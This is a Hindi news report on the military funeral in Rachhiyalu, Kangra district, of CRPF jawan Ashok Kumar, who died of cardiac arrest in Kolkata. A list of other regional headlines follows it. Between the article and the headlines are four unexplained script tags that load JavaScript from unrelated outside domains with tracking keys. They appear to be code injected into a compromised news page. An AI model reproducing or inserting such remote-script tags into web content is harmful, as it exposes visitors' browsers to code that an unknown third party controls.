<p>जिला कांगड़ा में शाहपुर के अंतर्गत आने वाले रछियालू के वीर जवान के पार्थिव शरीर को आज सैन्य सम्मान के साथ अंतिम संस्कार कर दिया गया। वीर जवान को सेंकडों लोगों ने नम आंखों से अंतिम विदाई दी। बता दें कि रछियालू के जवान अशोक कुमार का 13 दिसंबर को कोलकता में ह्रदय गति रुकने से मौत हो गई थी। अशोक कुमार की पार्थिव देह बीते कल शाम को रछियालू लाया गया। इससे पहले उनके पार्थिव देह को हवाई मार्ग से कोलकता से जम्मू लाया गया और जम्मू से सड़क मार्ग के माध्यम से उनकी देह को उनके गांव रछियालू लाया गया।</p>
<p>उनका देह जैसे ही घर पहुंचा पूरा क्षेत्र चीख-पुकार से गूंज उठा। आज सुबह उनकी पार्थिव देह का बनोई श्मशान घाट पर पूरे सैन्य सम्मान के साथ अंतिम संस्कार किया गया। अशोक के बेटे अजय ने उन्हें मुखाग्नि दी। अशोक अपने पीछे पत्नी ललिता देवी और दो बेटे छोड़ गए।</p>
<p>अशोक कुमार की देह के साथ आए केंद्रीय रिजर्व पुलिस के सब इंस्पेक्टर राज सिंह और साथी निरीक्षक तरसेम कुमार ने बताया कि अशोक कुमार मणिपुर में तैनात थे और 13 दिसंबर को ट्रांजिट कैंप कोलकाता में कुछ सामान लेने आए थे, जहां हृदय गति रुक जाने से उनकी मौत हो गई। प्रशासन की ओर से शाहपुर के नायब तहसीलदार सुरेंद्र कुमार अंतुम यात्रा में शामिल हुए और बहादुर जवान को श्रद्धांजलि अर्पित की।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1576481937427″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Shanta Kumar road accident prevention: पूर्व मुख्यमंत्री और पूर्व केंद्रीय मंत्री शांता कुमार ने केंद्रीय…
Ballot paper elections in India: हिमाचल प्रदेश के मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने देश…
Tragic Road Accident in Sirmour; सिरमौर जिले के पांवटा साहिब की तहसील में आंज भोज…
Mumbai: अजित पवार गुट के NCP नेता और पूर्व विधायक बाबा सिद्दीकी की शनिवार रात…
Kullu Dussehra Begins: राज्यपाल शिव प्रताप शुक्ल ने रविवार को कुल्लू के रथ मैदान में…
International Kullu Dussehra: जिला कुल्लू के मुख्यालय ढालपुर मैदान में आज से अंतरराष्ट्रीय दशहरा उत्सव…